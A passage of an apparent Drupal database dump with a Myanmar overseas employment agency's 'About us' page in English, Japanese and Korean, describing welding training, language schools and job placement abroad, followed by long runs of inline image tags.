data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 298, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\" data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\" data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\" data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 298, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_3.jpg\"><img data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 298, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 299, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_2.jpg\" data-align=\"center\" data-entity-uuid=\"57f9e79c-83d7-4db7-a975-0311fbe63328\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_2.jpg\" data-align=\"center\" data-entity-uuid=\"70254dac-c742-4d7a-8423-eaf0e5f62cb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_2.jpg\" data-align=\"center\" data-entity-uuid=\"3bdc401a-2f52-4f83-8f7a-647bd7c11600\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" 